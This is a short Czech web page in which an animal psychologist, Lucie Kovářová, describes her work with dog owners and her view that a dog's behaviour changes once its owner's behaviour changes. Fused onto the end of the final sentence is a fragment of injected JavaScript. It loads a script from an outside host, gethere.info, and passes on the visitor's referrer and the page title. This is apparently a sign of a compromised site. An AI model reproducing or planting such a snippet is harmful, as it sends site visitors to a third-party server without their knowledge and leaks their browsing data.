Dobrý den, jmenuji se Lucie Kovářová a jsem zvířecí psycholožka. Pracuji s majiteli psů, kteří mají nějaký problém a to jim brání si naplno užívat společný život. Moje práce spočívá ve zjištění, co jim brání se mít fajn. Pak majiteli vysvětlím a ukážu, jak by vytouženého stavu mohl dosáhnout. V průběhu snažení případně nacházím další možné cestičky či triky, jak co nejsnáze dosáhnout cíle.

Nápravou problémového chování zvířat se v ČR zabývá několik málo veterinářů a o trochu více výcvikářů. Podle zájmu klientů to vypadá, že potřebu pomoci a rady si uvědomuje stále více majitelů domácích mazlíčků.

Ze zkušenosti vím, že většina problémového chování psů je jen reakcí na okolí, tj. psi nejsou duševně nemocní či např. patologicky agresivní či bázliví. A vidím, že po poměrně krátké době práce s majitelem dochází k výrazným pozitivním změnám v chování psů.

Moje cesta jak pomoci začíná od lidí. Musela jsem se sice naučit alespoň orientačně zhodnotit, jestli pejsek netrpí nějakou nemocí (a pak vás nejdřív pošlu k dobrému veterináři), jsem sama majitelka dvou psů a tedy alfa fena minismečky, mám dlouholeté zkušenosti s výcvikem psů (k prvním zkouškám jsem přivedla střední kníračku ve svých 15 letech), ale hlavně si všímám lidí – páníčků. Jsem přesvědčená, že změna chování majitele je to základní, co je třeba ke změně chování psa.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;